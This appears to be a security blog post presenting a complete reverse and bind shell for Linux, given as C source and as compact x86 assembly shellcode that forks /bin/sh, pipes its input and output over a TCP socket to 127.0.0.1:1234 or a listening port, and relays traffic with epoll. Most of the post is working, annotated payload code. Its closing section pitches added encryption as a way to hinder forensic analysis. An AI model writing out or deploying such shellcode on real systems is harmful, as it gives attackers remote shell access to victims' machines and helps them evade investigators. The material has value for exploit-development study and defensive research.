Shellcode: Synchronous shell for Linux in x86 assembly

Introduction

Nowadays, most systems running on the x86 architecture take full advantage of AMD64 or INTEL64 extensions to increase performance, so I realize some of you will be disappointed this isn’t written in amd64 assembly. There will be a follow-up post about that later.

Here’s a bare-bones synchronous shell for Linux written in C, and an implementation of that code in x86 assembly. Once you’re familiar with how the synchronous shell works, you can include additional components like Diffie Hellman key exchange and authenticated encryption.

“UNIX Assembly Components (shellcodes)”, presented at Black Hat 2001 by the now-defunct LSD research group, is an excellent introduction to writing UNIX shellcodes for various CPU architectures. There’s no content in the paper about AArch/AArch64 (ARM) or the AMD 64-bit extensions, which weren’t available until after its publication, but the x86 information is still solid 17 years later and might be worth a look if you’re not already familiar with Linux-based shellcodes.

Another valuable resource for x86 is a mirror of the Linux assembly website by Konstantin Boldyshev.

C source

The shell itself is kept as simple as possible. There’s very little if any error checking performed, and the shell spawned is very basic.

#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <signal.h>
#include <sys/epoll.h>

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>

/*
 * Synchronous shell.
 *
 * Forks /bin/sh with its stdin/stdout/stderr redirected through two pipes,
 * then either connects out to 127.0.0.1:1234 or (when built with -DBIND)
 * accepts one connection on port 1234, and relays data between the socket
 * and the shell's pipes using epoll until either side goes away.
 *
 * argc/argv are unused. Always returns 0.
 */
int main(int argc, char *argv[])
{
    struct sockaddr_in sa;
    int                i, r, w, s, len, efd; 
    #ifdef BIND
    int                s2;
    #endif
    int                pid, fd, in[2], out[2];
    int                off, n;
    char               buf[BUFSIZ];
    struct epoll_event evts;
    char               *args[]={"/bin/sh", NULL};

    (void)argc;
    (void)argv;
  
    // create pipes for redirection of stdin/stdout/stderr
    pipe(in);
    pipe(out);

    // fork process
    pid = fork();
    
    // if child process
    if (pid==0){
      // assign read end to stdin
      dup2(in[0], STDIN_FILENO);
      // assign write end to stdout   
      dup2(out[1], STDOUT_FILENO);
      // assign write end to stderr  
      dup2(out[1], STDERR_FILENO);  
      
      // close pipes
      close(in[0]); close(in[1]);
      close(out[0]); close(out[1]);
      
      // execute shell
      execve(args[0], args, 0);
      // only reached if execve failed: do not fall through into
      // the parent's cleanup code with already-closed descriptors
      _exit(127);
    } else {      
      // close read and write ends
      close(in[0]); close(out[1]);
      
      // create a socket
      s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
      
      // start from a fully zeroed address (sin_zero included)
      memset(&sa, 0, sizeof(sa));
      sa.sin_family = AF_INET;
      sa.sin_port   = htons(atoi("1234"));
      
      #ifdef BIND
        // bind to port for incoming connections
        sa.sin_addr.s_addr = INADDR_ANY;
        
        bind(s, (struct sockaddr*)&sa, sizeof(sa));
        listen(s, 0);
        r=accept(s, 0, 0);
        // keep the listening socket in s2, talk on the accepted one
        s2=s; s=r;
      #else
        // connect to remote host
        sa.sin_addr.s_addr = inet_addr("127.0.0.1");
      
        r=connect(s, (struct sockaddr*)&sa, sizeof(sa));
      #endif
      
      // if ok
      if(r>=0){
        // open an epoll file descriptor
        efd = epoll_create1(0);
 
        // add 2 descriptors to monitor stdout and socket
        for (i=0; i<2; i++) {
          fd = (i==0) ? s : out[0];
          evts.data.fd = fd;
          evts.events  = EPOLLIN;
        
          epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
        }
          
        // now loop until user exits or some other error
        for (;;){
          r = epoll_wait(efd, &evts, 1, -1);
                  
          // error? bail out           
          if (r<=0) break;
         
          // not input? bail out
          if (!(evts.events & EPOLLIN)) break;

          fd = evts.data.fd;
          
          // assign socket or read end of output
          r=(fd==s)?s:out[0];
          // assign socket or write end of input
          w=(fd==s)?in[1]:s;

          // read from socket or stdout        
          len=read(r, buf, BUFSIZ);

          // 0 means the peer closed its end, <0 is an error. Without
          // this check a closed socket keeps reporting EPOLLIN and the
          // loop spins forever writing zero bytes.
          if (len<=0) break;
          
          // encrypt/decrypt data here
          
          // write to socket or stdin, retrying on short writes
          for (off=0; off<len; off+=n) {
            n=write(w, buf+off, len-off);
            if (n<=0) break;
          }
          // destination went away? bail out
          if (off<len) break;
        }      
        // remove 2 descriptors 
        epoll_ctl(efd, EPOLL_CTL_DEL, s, NULL);                  
        epoll_ctl(efd, EPOLL_CTL_DEL, out[0], NULL);                  
        close(efd);
      }
      // shutdown socket
      shutdown(s, SHUT_RDWR);
      close(s);
      #ifdef BIND
        close(s2);
      #endif
      // signal the shell
      // NOTE(review): the default action for SIGCHLD is to ignore it, so
      // this does not by itself terminate /bin/sh; the shell ends when it
      // sees EOF on stdin after in[1] is closed below.
      kill(pid, SIGCHLD);            
    }
    close(in[1]);
    close(out[0]);
    return 0; 
}

x86 assembly

Stack structure

; Layout of the local variable area that the shell code reserves on the
; stack (ebp points at its start). The field order matters: the code
; fills @pid, @s, (@s2) and @efd with successive stosd instructions, so
; reordering fields here would break it.
; epoll_event_size and BUFSIZ are not defined in this listing; presumably
; they come from include.inc.
struc ds_tbl
  @p_in  resd 2     ; pipe for stdin of shell
  @in0   equ  @p_in       ; in[0]: read end
  @in1   equ  @p_in+4     ; in[1]: write end
  
  @p_out resd 2     ; pipe for stdout/stderr of shell
  @out0  equ  @p_out      ; out[0]: read end
  @out1  equ  @p_out+4    ; out[1]: write end
  
  @pid   resd 1     ; process id for shell
  @s     resd 1     ; socket handle
%ifdef BIND
  @s2    resd 1     ; socket for bind (listening socket after accept)
%endif
  @efd   resd 1     ; event handle (epoll descriptor)
  @evts  resb epoll_event_size  ; single epoll_event used for ctl and wait
  @buf   resb BUFSIZ            ; relay buffer
endstruc

Assembly code

; -----------------------------------------------
; Synchronous shell for 32-bit Linux
;
; Forks /bin//sh with stdin/stdout/stderr redirected
; through two pipes, connects to 127.0.0.1:1234 (or,
; with BIND defined, accepts one connection on port
; 1234) and relays data between socket and shell with
; epoll until either side closes or an error occurs.
;
; Sizes quoted by the author, before the EOF/error
; check after read() was added (it costs 4 bytes):
; 314 bytes for connect
; 352 bytes for bind
;
; Register conventions used throughout:
;   ebp = base of ds_tbl on the stack
;   edi = cursor into ds_tbl, advanced by scasd/stosd;
;         ends up pointing at @evts
;   edx = 0 until the epoll set-up (used as a zero source)
;
; The SYS_*, EPOLL*, events/data, epoll_event_size and
; BUFSIZ symbols are not defined in this listing;
; presumably they come from include.inc.
;
; Several loops branch on flags set BEFORE an int 0x80
; (dec ecx / cmc), i.e. they rely on the system call
; returning with the flags unchanged.
; -----------------------------------------------

      %include "include.inc"

      %ifndef BIN
        global main
        global _main
      %endif     
           
      bits 32
    
main:    
_main:
      pushad
      ; allocate space for variables
      xor    ecx, ecx
      mul    ecx               ; eax = edx = 0
      mov    cl, ds_tbl_size   ; NOTE(review): assumes ds_tbl_size fits in 8 bits
      sub    esp, ecx
      mov    ebp, esp
      ; create pipes for redirection of stdin/stdout/stderr
      mov    edi, ebp
      mov    cl, 2
c_pipe:      
      ; pipe(in);
      ; pipe(out);
      mov    al, SYS_pipe
      mov    ebx, edi        ; ebx = p_in or p_out      
      int    0x80      
      scasd                  ; edi += 4
      scasd                  ; edi += 4
      loop   c_pipe    
      
      ; fork process
      ; pid = fork();
      mov    al, SYS_fork
      int    0x80    
      stosd                  ; save pid (edi now at @s)
      test   eax, eax        ; already forked?
      jnz    opn_con         ; parent: open connection
      
      ; child only from here to execve
      ;
      ; in this order..
      ;
      ; dup2 (out[1], STDERR_FILENO)      
      ; dup2 (out[1], STDOUT_FILENO)
      ; dup2 (in[0],  STDIN_FILENO )   
      mov    cl, 3                ; ecx = STDERR_FILENO + 1
      mov    ebx, [ebp+@out1]     ; ebx = out[1]
c_dup:
      mov    al, SYS_dup2
      dec    ecx             ; becomes STDERR, STDOUT, then STDIN_FILENO      
      cmovz  ebx, [ebp+@in0] ; replace stdin with in[0]      
      int    0x80
      jnz    c_dup           ; ZF still from dec ecx above
  
      ; close pipe handles in this order..
      ;
      ; close(in[0]);
      ; close(in[1]);
      ; close(out[0]);
      ; close(out[1]);
      mov    esi, ebp          ; esi = p_in and p_out
      mov    cl, 4             ; close 4 handles     
cls_pipe:
      lodsd                    ; eax = pipes[i]
      xchg   eax, ebx      
      push   SYS_close
      pop    eax 
      int    0x80
      loop   cls_pipe      
      
      ; execve("/bin//sh", 0, 0);
      mov    al, SYS_execve
      push   ecx               ; push null terminator (ecx = 0 after loop)
      push   '//sh'
      push   '/bin'
      mov    ebx, esp          ; ebx = "/bin//sh", 0
      int    0x80
      ; NOTE(review): if execve fails the child falls through into
      ; the parent's code below.
opn_con:    
      ; close(in[0]);
      push   SYS_close
      pop    eax
      mov    ebx, [ebp+@in0]    
      int    0x80    

      ; close(out[1]);
      mov    al, SYS_close     
      mov    ebx, [ebp+@out1]    
      int    0x80   
      
      ; s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);     
      mov    al, SYS_socketcall
      push   SYS_SOCKET        ; ebx = 1
      pop    ebx
      push   edx               ; protocol = IPPROTO_IP
      push   ebx               ; type     = SOCK_STREAM
      push   2                 ; family   = AF_INET
      mov    ecx, esp          ; ecx      = &args      
      int    0x80 
      add    esp, 3*4          ; release args to socket
      stosd                    ; save socket in @s
      
      ; build sockaddr_in on the stack (8 bytes pushed), followed by
      ; the 3-dword argument block for socketcall
      %ifdef BIND
        push edx               ; sa.sin_addr=INADDR_ANY
      %else
        push 0x0100007f        ; sa.sin_addr=127.0.0.1
      %endif
      push   0xD2040002        ; sa.sin_port=htons(1234)
                               ; sa.sin_family=AF_INET
      mov    ecx, esp          ; ecx = &sa
      
      push   16                ; sizeof(sa)      
      push   ecx               ; &sa
      push   eax               ; s
      mov    ecx, esp          ; &args       
%ifdef BIND  
      push   SYS_socketcall
      pop    eax
      ; bind (s, &sa, sizeof(sa));
      inc    ebx                ; ebx = 2, SYS_BIND     
      int    0x80
      add    esp, 5*4           ; release sa and args (balanced stack for cls_sck)
      test   eax, eax
      jnz    cls_sck
      
      sub    esp, 5*4           ; re-claim the same args for listen/accept
      mov    [ecx+4], eax       ; clear sa from args (eax = 0 here)

      ; listen (s, 0);
      mov    al, SYS_socketcall
      mov    bl, SYS_LISTEN     ; ebx = 4
      int    0x80

      ; accept (s, 0, 0);
      mov    al, SYS_socketcall
      inc    ebx                ; ebx = 5, SYS_ACCEPT
      int    0x80
      add    esp, 5*4           ; release sa and args
      test   eax, eax
      jl     cls_sck
      
      xchg   dword[ebp+@s], eax ; @s = accepted socket, eax = listener
      stosd                     ; save listener as s2
%else
      ; connect (s, &sa, sizeof(sa)); 
      push   SYS_socketcall
      pop    eax
      mov    bl, SYS_CONNECT    ; ebx = 3
      int    0x80      
      add    esp, 5*4           ; release sa and args to connect
      test   eax, eax
      jl     cls_sck
%endif
      ; efd = epoll_create1(0);
      mov    al, SYS_epoll_create1 & 0xFF
      mov    ah, SYS_epoll_create1 >> 8
      xor    ebx, ebx           ; flags = 0; also sets CF=0 for poll_init
      int    0x80
      stosd                     ; save efd (edi now at @evts)
      
      ; add 2 descriptors to monitor stdout and socket
      xchg   eax, ebx           ; ebx = efd
      mov    edx, [ebp+@s]       
poll_init:
      ; epoll_ctl(efd, EPOLL_CTL_ADD, i==0 ? s : out[0], &evts);
      mov    esi, edi          ; esi = &evts
      push   EPOLLIN
      pop    eax               ; evts.events = EPOLLIN
      mov    [esi+events], eax
      mov    [esi+data  ], edx ; evts.data.fd = i==0 ? s : out[0]
      mov    al, SYS_epoll_ctl    
      push   EPOLL_CTL_ADD
      pop    ecx
      int    0x80
      mov    edx, [ebp+@out0]  ; do out[0] in 2nd loop      
      cmc                      ; !CF: CF=1 after 1st pass, 0 after 2nd
      jc     poll_init      
      ; now loop until user exits or some other error      
poll_wait:
      ; epoll_wait(efd, &evts, 1, -1);
      mov    esi, -1           ; timeout = -1
      xor    eax, eax          ; eax = SYS_epoll_wait
      mov    ah, 1        
      cdq                      ; edx = 0
      inc    edx               ; edx = 1 event 
      mov    ecx, edi          ; ecx = evts
      mov    ebx, [ebp+@efd]
      int    0x80
      
      ; if (r != 1) break;   (one event was requested)
      dec    eax               ; test   eax, eax
      jnz    cls_efd           ; jle    cls_efd
      
      mov    esi, edi
      lodsd                    ; eax = evt.events
      
      ; if (evts.events != EPOLLIN) break;
      ; stricter than the C "& EPOLLIN" test: any extra bit also exits
      dec    eax               ; test   al, EPOLLIN
      jnz    cls_efd

      lodsd                    ; eax = evt.data.fd       
      ; r=(fd==s)?s:out[0];
      ; w=(fd==s)?in[1]:s;
      xchg   ebx, eax          ; ebx = evt.data.fd (the descriptor to read)
      cmp    ebx, [ebp+@s]     ; if socket event
      cmove  eax, [ebp+@in1]   ; write to in[1]
      cmovne eax, [ebp+@s]     ; else read from out[0], write to s
      push   eax               ; save w across the read
      
      ; len = read(r, buf, BUFSIZ);
      xor    esi, esi          ; esi = 0 (not an argument of read)
      mov    ecx, edi          ; edi still points at @evts, so the data
                               ; lands at evts and runs on into buf;
                               ; BUFSIZ bytes from there stay inside ds_tbl
      cdq                      ; edx = 0
      mov    dl, BUFSIZ        ; edx = BUFSIZ
      push   SYS_read          ; eax = SYS_read
      pop    eax
      int    0x80
      pop    ebx               ; ebx = w (s or in[1]); stack balanced again

      ; if (len <= 0) break;
      ; 0 = peer closed, <0 = error. Without this a closed socket keeps
      ; signalling EPOLLIN and the loop spins writing zero bytes.
      test   eax, eax
      jle    cls_efd
      
      ; encrypt/decrypt buffer
      
      ; write(w, buf, len);
      xchg   eax, edx          ; edx = len, eax = BUFSIZ
      mov    al, SYS_write
      int    0x80
      jmp    poll_wait
cls_efd: 
      ; remove 2 descriptors
      xor    esi, esi          ; esi = NULL; also sets CF=0 for cls_loop
      mov    edx, [ebp+@s]
cls_loop:
      ; epoll_ctl(efd, EPOLL_CTL_DEL, fd, NULL);
      mov    eax, esi
      mov    al, SYS_epoll_ctl
      push   EPOLL_CTL_DEL
      pop    ecx
      mov    ebx, [ebp+@efd]
      int    0x80
            
      ; do out[0] next      
      mov    edx, [ebp+@out0]
      cmc                      ; CF=1 after 1st pass, 0 after 2nd
      jc     cls_loop
           
      ; close(efd);   (ebx still holds efd)
      mov    al, SYS_close
      int    0x80
cls_sck:
      ; shutdown socket
      ; shutdown(s, SHUT_RDWR);
      push   SYS_shutdown & 0xFF
      pop    eax
      mov    ah, 1             ; NOTE(review): assumes SYS_shutdown >> 8 == 1
      push   SHUT_RDWR
      pop    ecx
      mov    ebx, [ebp+@s]
      int    0x80
      
      ; close(s);   (ebx still holds s)
      push   SYS_close
      pop    eax
      int    0x80
%ifdef BIND
      ; close(s2);
      ; NOTE(review): @s2 is only written after a successful accept
      mov    al, SYS_close
      mov    ebx, [ebp+@s2]
      int    0x80
%endif 
      ; signal /bin/sh
      ; kill(pid, SIGCHLD);
      mov    al, SYS_kill
      mov    cl, SIGCHLD
      mov    ebx, [ebp+@pid]
      int    0x80

      ; close(in[1]);
      mov    al, SYS_close    
      mov    ebx, [ebp+@in1]
      int    0x80   

      ; close(out[0]);
      mov    al, SYS_close    
      mov    ebx, [ebp+@out0]
      int    0x80   
      
      ; only include exit system call
      ; if compiled as ELF
%ifndef BIN
      ; exit(0);
      xor    ebx, ebx          ; status = 0 (ebx still held out[0])
      mov    al, SYS_exit
      int    0x80
%else
      ; release memory 
      add    esp, ds_tbl_size
      ; restore registers
      popad
      ret
%endif

Testing

You can assemble as 32-bit ELF for either bind or connect functionality. Define BIND in the source or on the command line when assembling. For a standalone binary, do the following.

The only reason -m32 is used with GCC here is because I’m compiling on a 64-bit system with multi-arch support enabled. On a native 32-bit system, this would not be required.

For this shell, ncat or netcat is perfectly fine. Here’s an example of using ncat as a listener for the reverse-connect shell.

Summary

Because we use signals or events to monitor I/O operations between network and child process, we can manipulate the data being sent and received. Enabling encryption would hinder any forensic analysis of data passing over the network.

Ideally, it should perform key exchange with something like Diffie-Hellman to establish a shared key before using authenticated encryption to protect data between two systems.

Sources here

This entry was posted in assembly, linux, security, shellcode and tagged , , , . Bookmark the permalink.

3 Responses to Shellcode: Synchronous shell for Linux in x86 assembly

  1. Pingback: Shellcode: Synchronous shell for Linux in amd64 assembly | modexp

  2. Pingback: Synchronous shell for Linux in ARM32 assembly | modexp

  3. Pingback: Shellcode: Encrypting traffic | modexp

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s